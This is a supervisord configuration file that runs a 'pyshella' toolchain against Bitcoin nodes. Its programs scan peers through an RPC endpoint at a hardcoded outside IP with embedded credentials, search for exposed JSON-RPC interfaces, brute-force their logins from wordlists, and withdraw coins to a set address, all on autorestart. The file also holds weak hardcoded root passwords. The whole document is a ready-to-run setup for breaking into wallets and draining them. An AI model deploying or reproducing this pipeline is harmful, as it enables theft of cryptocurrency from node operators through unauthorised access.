[unix_http_server]
file=/run/supervisor.sock
username=root
password=toor

[supervisord]
logfile=/var/log/supervisor/supervisord.log
logfile_maxbytes=10MB
loglevel=error
pidfile=/run/supervisord.pid
nodaemon=false
minfds=100000
user=root

[supervisorctl]
serveurl=unix:///run/supervisor.sock
username=root
password=toor

[program:peers-scanner]
command=~/.local/bin/pyshella-peers-scanner -nU http://bitcoinrpc:80d3fa20b89f12225a4d3d54634601c7@46.160.199.52:18332 -mU mongodb://root:toor@localhost:27017 -b 30 -i 10 -n Bitcoin
autostart=true
autorestart=true

[program:jsonrpc-searcher]
command=~/.local/bin/pyshella-jsonrpc-searcher -mU mongodb://root:toor@localhost:27017 -n Bitcoin -bT 1 -hS 1 -pS 15 -v True
autostart=true
autorestart=true

[program:jsonrpc-bruter]
command=~/.local/bin/pyshella-jsonrpc-bruter -mU mongodb://root:toor@localhost:27017 -n Bitcoin -t 20 -l logins_file -p pwds_file -b HLP
autostart=true
autorestart=true

[program: jsonrpc-coins-withdrawal]
command=~/.local/bin/pyshella-coins-withdrawal -mU mongodb://root:toor@localhost:27017 -n Bitcoin -a withdrawal_addr -i 300
autostart=true
autorestart=true
